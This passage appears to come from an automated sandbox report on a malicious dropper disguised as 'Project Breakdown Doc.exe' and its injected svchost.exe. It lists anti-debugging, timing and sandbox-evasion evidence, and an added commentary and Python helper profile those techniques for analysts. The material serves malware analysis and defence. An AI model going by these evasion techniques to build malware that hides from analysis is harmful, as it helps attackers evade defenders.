                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx 1_2_03B309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B0283D push eax; iretd 1_2_03B02858
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CC55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C633C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\powercfg.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | API/Special instruction interceptor: Address: 1783224
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\powercfg.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc
                Source: C:\Windows\SysWOW64\powercfg.exe | Window / User API: threadDelayed 1845
                Source: C:\Windows\SysWOW64\powercfg.exe | Window / User API: threadDelayed 8128
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836 | Thread sleep count: 1845 > 30
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836 | Thread sleep time: -3690000s >= -30000s
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836 | Thread sleep count: 8128 > 30
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836 | Thread sleep time: -16256000s >= -30000s
                Source: C:\Windows\SysWOW64\powercfg.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CA4696
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAC9C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC93C FindFirstFileW,FindClose,0_2_00CAC93C
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936350373.00000000009FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2572768872.0000023C214FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\powercfg.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417ED3 LdrLoadDll
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CB41FD BlockInput
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C75CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CBC304 LoadLibraryA,GetProcAddress
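The rows above are the evidence behind the report's anti-debugging and sandbox-evasion signatures: directory enumeration and OS fingerprinting in the dropper (process 0), a ProcessDebugPort query, an rdtsc timing check and LdrLoadDll in the svchost.exe that receives the injected code (process 1), and BlockInput, IsDebuggerPresent and LoadLibraryA/GetProcAddress resolution back in the dropper. Two caveats a reader should apply: 0_2_00C75CCC, with ___crtIsPackagedApp and the EncodePointer/DecodePointer wrapping around its GetProcAddress calls, is the shape of the MSVC runtime's own startup and error-reporting code, so its IsDebuggerPresent/OutputDebugStringW hit is weak evidence by itself; and the "Hyper-V RAW" string is the name of the Winsock Hyper-V socket provider, which appears in the memory of any process that has loaded mswsock.dll (firefox.exe shows it too), so it is not by itself a sign of VM detection. The following Python helper is an added example, not part of the Joe Sandbox report: it parses rows in the report's layout (the constructed sample rows are modelled on the ones above, not copied from them, and the technique labels and the two-technique threshold are my own choices) and builds a per-process anti-analysis profile, so that the combination of checks in the injected svchost.exe can be compared with the dropper's.

```python
import re
from collections import defaultdict

# Constructed sample rows in the layout of the report table above: the source cell and the
# evidence cell run together, and the function id is repeated as the report's jump link.
# Modelled on the report's rows, not copied from it.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,ShellExecuteW,0_2_00C43B4C",
    r"Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CBC304 LoadLibraryA,GetProcAddress,0_2_00CBC304",
    r"Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB41FD BlockInput,0_2_00CB41FD",
    r"Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_017834F0 mov eax, dword ptr fs:[00000030h]0_2_017834F0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417ED3 LdrLoadDll,1_2_00417ED3",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\powercfg.exeProcess queried: DebugPortJump to behavior",
]

# "Code function" row: source path, function id, evidence, optional repeated id (jump link).
# The optional " | " lets the same regex accept rows whose cells have been separated.
CODE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<body>.*?)\s*(?:(?P=fid))?\s*$"
)
# "Process queried" row: an NtQueryInformationProcess information class such as DebugPort.
QUERY_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|?\s*Process queried:\s*(?P<what>[A-Za-z]+)\s*$")

# Technique labels are my own shorthand for what each API hit evidences.
API_TECHNIQUES = {
    "IsDebuggerPresent": "debugger check: IsDebuggerPresent",
    "OutputDebugStringW": "debugger check: OutputDebugString/GetLastError",
    "rdtsc": "timing check: rdtsc",
    "BlockInput": "input blocking: BlockInput",
    "LdrLoadDll": "loader access: LdrLoadDll",
    "FindFirstFileW": "directory enumeration: FindFirstFileW",
    "GetVersionExW": "OS fingerprinting: GetVersionExW",
    "IsWow64Process": "OS fingerprinting: IsWow64Process",
}
QUERY_TECHNIQUES = {"DebugPort": "debugger check: NtQueryInformationProcess(ProcessDebugPort)"}


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def profile(rows):
    """Map each process image name to the sorted list of techniques evidenced for it."""
    found = defaultdict(set)
    for raw in rows:
        row = re.sub(r"\s*Jump to behavior\s*$", "", raw)  # strip the report's link text
        m = CODE_RE.match(row)
        if m:
            proc, body = _basename(m.group("src")), m.group("body")
            if "fs:[00000030h]" in body:  # 32-bit TEB -> PEB pointer load
                found[proc].add("PEB read: mov reg, fs:[30h]")
                continue
            calls = {c.strip() for c in body.split(",") if c.strip()}
            found[proc].update(t for api, t in API_TECHNIQUES.items() if api in calls)
            if "GetProcAddress" in calls and any(c.startswith("LoadLibrary") for c in calls):
                found[proc].add("dynamic API resolution: LoadLibrary*+GetProcAddress")
            continue
        m = QUERY_RE.match(row)
        if m and m.group("what") in QUERY_TECHNIQUES:
            found[_basename(m.group("src"))].add(QUERY_TECHNIQUES[m.group("what")])
    return {proc: sorted(t) for proc, t in found.items()}


def ranked(found, min_techniques=2):
    """Processes showing at least min_techniques distinct techniques, most first."""
    hits = [(p, len(t)) for p, t in found.items() if len(t) >= min_techniques]
    return sorted(hits, key=lambda x: (-x[1], x[0]))


if __name__ == "__main__":
    found = profile(SAMPLE_ROWS)
    for proc, count in ranked(found):
        print(f"{proc}: {count} techniques")
        for t in found[proc]:
            print("   ", t)
```

Feed it the rows of the full report (one row per line) instead of SAMPLE_ROWS to profile every process; the single ProcessDebugPort query in powercfg.exe falls below the threshold on its own, while both the dropper and the injected svchost.exe clear it.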
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_017834F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_01783490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_01781E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h] (1 occurrence); mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h] (6 occurrences); mov ecx, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h] (2 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h] (1 occurrence); mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h] (1 occurrence); mov eax, dword ptr fs:[00000030h] (1 occurrence)
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]1_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]1_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]1_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]1_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]1_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]1_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]1_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]1_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]1_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]1_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]1_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]1_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]1_2_03BB05A7
